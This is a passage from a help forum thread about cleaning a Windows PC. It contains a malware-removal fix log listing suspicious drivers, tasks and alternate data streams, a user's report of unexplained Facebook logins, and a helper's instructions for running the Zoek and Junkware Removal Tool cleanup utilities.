Task: {E1303010-25DC-4FEC-9EBE-33A7E35BB7B3} - System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => C:\Program Files (x86)\Microsoft Visual Studio\Installer.021f431b30104264a8dbbd90054a1361\resources\app\ServiceHub\Services\Microsoft.VisualStudio.Setup.Service\BackgroundDownload.exe (No File)
S3 qmeyutfnfe; \??\C:\Windows\eqyvkatwim.sys [X]
S3 rxyfbwoazs; \??\C:\Windows\kytgzgrgpv.sys [X]
S3 USBAAPL64; System32\Drivers\usbaapl64.sys [X]
S3 xhunter1; \??\C:\Windows\xhunter1.sys [X]
S3 cqwzjpilmi; \??\C:\Windows\xdmkcicuts.sys [X]
S3 Mac606; system32\DRIVERS\Mac606.sys [X]
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}
C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}
C:\Program Files (x86)\8iq24splw1.dat
C:\Users\John\AppData\Roaming\changzhi_leidian.data
ContextMenuHandlers1: [GDContextMenu] -> [CC]{BB02B294-8425-42E5-983F-41A1FA970CD6} => -> No File
ContextMenuHandlers1: [GpgEX] -> [CC]{CCD955E4-5C16-4A33-AFDA-A8947A94946B} => -> No File
ContextMenuHandlers4: [GpgEX] -> [CC]{CCD955E4-5C16-4A33-AFDA-A8947A94946B} => -> No File
ContextMenuHandlers1_S-1-5-21-949114339-2066100574-2594248327-1000: [CloudStation.SyncFolderContextMenu] -> {2C4A5D61-009C-4561-9A33-6AFD542FD237} => C:\Users\John\AppData\Local\SynologyDrive\SynologyDrive.app\icon-overlay\22\x64\ContextMenu.dll [2022-04-21] (Synology Inc. -> )
ContextMenuHandlers6_S-1-5-21-949114339-2066100574-2594248327-1000: [CloudStation.SyncFolderContextMenu] -> {2C4A5D61-009C-4561-9A33-6AFD542FD237} => C:\Users\John\AppData\Local\SynologyDrive\SynologyDrive.app\icon-overlay\22\x64\ContextMenu.dll [2022-04-21] (Synology Inc. -> )
AlternateDataStreams: C:\Windows\system32\-1.14-windows.xml:B72225CA78 [10]
AlternateDataStreams: C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0:74DBE02D40 [10]
AlternateDataStreams: C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0:23D10F59A6 [10]
AlternateDataStreams: C:\Windows\system32\AcpiServiceVnA64.dll:ECA79956BD [10]
AlternateDataStreams: C:\ProgramData\DP45977C.lfl:677104FCAA [10]
AlternateDataStreams: C:\ProgramData\ReclaiMe.config:AC4DBEED78 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk:8ACB4E955C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini:B1DA6C571C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\WebDrive.lnk:D8006AA692 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk:0E0659E205 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2015.lnk:37833A1060 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Audition CC 2015.lnk:38307C6C28 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk:7661CCE9BF [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator CC 2018.lnk:DAEDFEEC9C [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CC 2015.lnk:742FE07988 [10]
AlternateDataStreams: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro CC 2018.lnk:6306D2B3A2 [10]
AlternateDataStreams: C:\Users\John\Desktop\normal paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\normal paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\obrazok full.bmp:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\obrazok full.bmp:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [83]
AlternateDataStreams: C:\Users\John\Desktop\paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\scaner.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\scaner.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\John\Desktop\trident paska.jpeg:3or4kl4x13tuuug3Byamue2s4b [95]
AlternateDataStreams: C:\Users\John\Desktop\trident paska.jpeg:{4c8cc155-6c1e-11d1-8e41-00c04fb9386d} [0]
AlternateDataStreams: C:\Users\Public\DRM:احتضان [48]
AlternateDataStreams: C:\Users\Public\Shared Files:VersionCache [2716]
FirewallRules: [{381E8692-D05F-4768-A03E-BFB42D82C8D3}] => (Allow) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [{EDDFFEFC-8551-4AA9-BE1C-EB1B265415F1}] => (Allow) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [{030F7113-6734-41CD-A4E5-D34B67B56903}] => (Block) C:\Program Files\SOLIDWORKS Corp\SOLIDWORKS Visualize\SWVisualize.Queue.Server.exe => No File
FirewallRules: [TCP Query User{50B80FF9-B48B-48D6-A507-0EA094981F89}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe] => (Allow) C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe => No File
FirewallRules: [UDP Query User{C90E849D-29A2-4C03-B8A7-1792AD84086D}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe] => (Allow) C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe => No File
FirewallRules: [TCP Query User{96283949-D938-4702-90E1-A40E3D5EA41F}C:\program files\java\jdk-17.0.2\bin\javaw.exe] => (Allow) C:\program files\java\jdk-17.0.2\bin\javaw.exe => No File
FirewallRules: [UDP Query User{06C70B7D-B663-495B-9A18-DACF08A4EBFF}C:\program files\java\jdk-17.0.2\bin\javaw.exe] => (Allow) C:\program files\java\jdk-17.0.2\bin\javaw.exe => No File
FirewallRules: [TCP Query User{916FC264-EED5-4BB7-9B18-F8ADE1CC8CF0}C:0\windows programy\eclipse\eclipse.exe] => (Allow) C:0\windows programy\eclipse\eclipse.exe => No File
FirewallRules: [UDP Query User{E125AE56-1109-4C2E-8FD4-B67BA7DB3D7B}C:0\windows programy\eclipse\eclipse.exe] => (Allow) C:0\windows programy\eclipse\eclipse.exe => No File
FirewallRules: [TCP Query User{5A1E576C-C69B-4EA0-A00E-9DB366EB4991}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe] => (Allow) C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe => No File
FirewallRules: [UDP Query User{F8DABE4A-53B9-42AF-A20F-99AF53E57D45}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe] => (Allow) C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe => No File
FirewallRules: [{5990ECB6-4B3B-4441-A614-264DCBBF16F2}] => (Allow) I:\windows programy\davinci\ElementsPanelDaemon.exe => No File
FirewallRules: [{FC9A4AA6-7DF0-48D7-85E3-08B9F860D161}] => (Allow) I:\windows programy\davinci\OxygenPanelDaemon.exe => No File
FirewallRules: [{257BE348-CCF6-4567-A911-19F0393770BC}] => (Allow) C:\ProgramData\Blackmagic Design\DaVinci Resolve\Support\QtDecoder\QTDecoder.exe => No File

EmptyTemp:
Hosts:
End
*****************

Processes closed successfully.
"HKLM\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\\" => removed successfully

"C:\Windows\system32\GroupPolicy\Machine" folder move:

C:\Windows\system32\GroupPolicy\Machine => moved successfully
C:\Windows\system32\GroupPolicy\GPT.ini => moved successfully
C:\Windows\SysWOW64\GroupPolicy\GPT.ini => moved successfully
C:\ProgramData\NTUSER.pol => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{AC5DCEC8-7ADC-420A-928F-2E4D77508D8B}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{AC5DCEC8-7ADC-420A-928F-2E4D77508D8B}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{795E77E3-0EEC-4504-9D64-C02F56BB6298}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{795E77E3-0EEC-4504-9D64-C02F56BB6298}" => removed successfully
C:\Windows\System32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55} => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{E1303010-25DC-4FEC-9EBE-33A7E35BB7B3}" => removed successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{E1303010-25DC-4FEC-9EBE-33A7E35BB7B3}" => removed successfully
C:\Windows\System32\Tasks\Microsoft\VisualStudio\Updates\BackgroundDownload => moved successfully
"HKLM\Software\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\VisualStudio\Updates\BackgroundDownload" => removed successfully
HKLM\System\CurrentControlSet\Services\qmeyutfnfe => removed successfully
qmeyutfnfe => service removed successfully
HKLM\System\CurrentControlSet\Services\rxyfbwoazs => removed successfully
rxyfbwoazs => service removed successfully
HKLM\System\CurrentControlSet\Services\USBAAPL64 => removed successfully
USBAAPL64 => service removed successfully
HKLM\System\CurrentControlSet\Services\xhunter1 => removed successfully
xhunter1 => service removed successfully
HKLM\System\CurrentControlSet\Services\cqwzjpilmi => removed successfully
cqwzjpilmi => service removed successfully
HKLM\System\CurrentControlSet\Services\Mac606 => removed successfully
Mac606 => service removed successfully
"C:\Windows\system32\Tasks\GoogleUpdateTaskMachineUA{9E7714E1-0F70-44F9-91E7-9EEB5456DC55}" => not found
"C:\Windows\system32\Tasks\GoogleUpdateTaskMachineCore{1C7C4B8C-A49C-4FAF-9C7A-5F1C3DF6C86E}" => not found
C:\Program Files (x86)\8iq24splw1.dat => moved successfully
C:\Users\John\AppData\Roaming\changzhi_leidian.data => moved successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\GDContextMenu => removed successfully
HKLM\Software\Classes\*\ShellEx\ContextMenuHandlers\GpgEX => removed successfully
HKLM\Software\Classes\Directory\ShellEx\ContextMenuHandlers\GpgEX => removed successfully
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\Software\Classes\*\ShellEx\ContextMenuHandlers\CloudStation.SyncFolderContextMenu => removed successfully
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\SOFTWARE\Classes\CLSID\{2C4A5D61-009C-4561-9A33-6AFD542FD237} => removed successfully
HKU\S-1-5-21-949114339-2066100574-2594248327-1000\Software\Classes\Folder\ShellEx\ContextMenuHandlers\CloudStation.SyncFolderContextMenu => removed successfully
C:\Windows\system32\-1.14-windows.xml => ":B72225CA78" ADS removed successfully
C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 => ":74DBE02D40" ADS removed successfully
C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 => ":23D10F59A6" ADS removed successfully
C:\Windows\system32\AcpiServiceVnA64.dll => ":ECA79956BD" ADS removed successfully
C:\ProgramData\DP45977C.lfl => ":677104FCAA" ADS removed successfully
C:\ProgramData\ReclaiMe.config => ":AC4DBEED78" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Default Programs.lnk => ":8ACB4E955C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\desktop.ini => ":B1DA6C571C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\WebDrive.lnk => ":D8006AA692" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Windows Update.lnk => ":0E0659E205" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe After Effects CC 2015.lnk => ":37833A1060" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Audition CC 2015.lnk => ":38307C6C28" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Creative Cloud.lnk => ":7661CCE9BF" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Illustrator CC 2018.lnk => ":DAEDFEEC9C" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Photoshop CC 2015.lnk => ":742FE07988" ADS removed successfully
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Premiere Pro CC 2018.lnk => ":6306D2B3A2" ADS removed successfully
C:\Users\John\Desktop\normal paska.jpeg => ":3or4kl4x13tuuug3Byamue2s4b" ADS could not remove.
C:\Users\John\Desktop\normal paska.jpeg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
C:\Users\John\Desktop\obrazok full.bmp => ":3or4kl4x13tuuug3Byamue2s4b" ADS could not remove.
C:\Users\John\Desktop\obrazok full.bmp => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
C:\Users\John\Desktop\paska.jpeg => ":3or4kl4x13tuuug3Byamue2s4b" ADS could not remove.
C:\Users\John\Desktop\paska.jpeg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
C:\Users\John\Desktop\scaner.jpeg => ":3or4kl4x13tuuug3Byamue2s4b" ADS could not remove.
C:\Users\John\Desktop\scaner.jpeg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
C:\Users\John\Desktop\trident paska.jpeg => ":3or4kl4x13tuuug3Byamue2s4b" ADS could not remove.
C:\Users\John\Desktop\trident paska.jpeg => ":{4c8cc155-6c1e-11d1-8e41-00c04fb9386d}" ADS removed successfully
C:\Users\Public\DRM => ":احتضان" ADS removed successfully
C:\Users\Public\Shared Files => ":VersionCache" ADS removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{381E8692-D05F-4768-A03E-BFB42D82C8D3}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{EDDFFEFC-8551-4AA9-BE1C-EB1B265415F1}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{030F7113-6734-41CD-A4E5-D34B67B56903}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{50B80FF9-B48B-48D6-A507-0EA094981F89}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{C90E849D-29A2-4C03-B8A7-1792AD84086D}C:\program files\cisco packet tracer 7.3.1\bin\packettracer7.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{96283949-D938-4702-90E1-A40E3D5EA41F}C:\program files\java\jdk-17.0.2\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{06C70B7D-B663-495B-9A18-DACF08A4EBFF}C:\program files\java\jdk-17.0.2\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{916FC264-EED5-4BB7-9B18-F8ADE1CC8CF0}C:0\windows programy\eclipse\eclipse.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{E125AE56-1109-4C2E-8FD4-B67BA7DB3D7B}C:0\windows programy\eclipse\eclipse.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\TCP Query User{5A1E576C-C69B-4EA0-A00E-9DB366EB4991}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\UDP Query User{F8DABE4A-53B9-42AF-A20F-99AF53E57D45}C:0\windows programy\eclipse\plugins\org.eclipse.justj.openjdk.hotspot.jre.full.win32.x86_64_17.0.6.v20230204-1729\jre\bin\javaw.exe" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{5990ECB6-4B3B-4441-A614-264DCBBF16F2}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{FC9A4AA6-7DF0-48D7-85E3-08B9F860D161}" => removed successfully
"HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{257BE348-CCF6-4567-A911-19F0393770BC}" => removed successfully
C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

FlushDNS => completed
BITS transfer queue => 0 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 75007194 B
Java, Discord, Steam htmlcache, WinHttpAutoProxySvc/winhttp *.cache => 611453322 B
Windows/system/drivers => 363314582 B
Edge => 0 B
Chrome => 353424969 B
Firefox => 116041466 B
Opera => 165074806 B

Temp, IE cache, history, cookies, recent:
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 0 B
systemprofile32 => 128 B
LocalService => 128 B
NetworkService => 836984 B
John => 64055413552 B
Test => 64074968159 B

RecycleBin => 467863419 B
EmptyTemp: => 121.3 GB temporary data Removed.

================================


The system needed a reboot.

==== End of Fixlog 10:18:25 ====

Re: Logging in to FB, windows opening in the browser

Posted: 18 Feb 2024 11:05
by Rudy
Deleted. Has anything changed?

Re: Logging in to FB, windows opening in the browser

Posted: 18 Feb 2024 12:37
by mivefe5888
I tried logging in to FB again, and after a while I again got a notification that someone had logged in there and that I must change my password, so no change.

Re: Logging in to FB, windows opening in the browser

Posted: 18 Feb 2024 15:19
by Rudy
I get those too. But I know that it is me. I have already complained about it, but nothing from FB. Isn't it you yourself?

Re: Logging in to FB, windows opening in the browser

Posted: 19 Feb 2024 19:53
by mivefe5888
Since it tells me the login was from Chrome for Windows 10, and it only happens when I log in from my PC, where I use Opera and have Windows 7, it won't be me, and I don't think it is Facebook's fault either, because on my laptop I can log in without any problem. Also, I have been using the same PC for several years.

Re: Logging in to FB, windows opening in the browser

Posted: 19 Feb 2024 20:00
by Rudy
Then probably not. I get e-mails that show the same time as when I log in there myself, the same browser and the same operating system. We can still clean up the browsers:

Run these utilities one after another:


1. Download Zoek.exe https://www.edisk.cz/stahni/21334/zoek.rar_1.3MB.html/ and save it to the desktop

If you use Windows Vista or Windows 7, right-click Zoek and choose Run As Administrator (Spustit jako spravce)
Paste the script below into the window

autoclean;
resethosts;
emptyclsid;
IEdefaults;
FFdefaults;
CHRdefaults;
emptyIEcache;
emptyFFcache;
emptyCHRcache;
emptyalltemp;
emptyflash;
emptyjava;
emptyrecycle.bin;

Then click Run Script
The PC will perform the repair, restart, and give you a log; paste its contents here.

and

2. Junkware removal tool: https://www.stahuj.cz/utility_a_ostatni ... oval-tool/
•Save it, preferably to the desktop
•After launching, the license terms are displayed; press any key
•A backup is created, followed by the scan
•The scan runs and then a log appears, or it is saved in c:\JRT as JRT.txt; paste it here.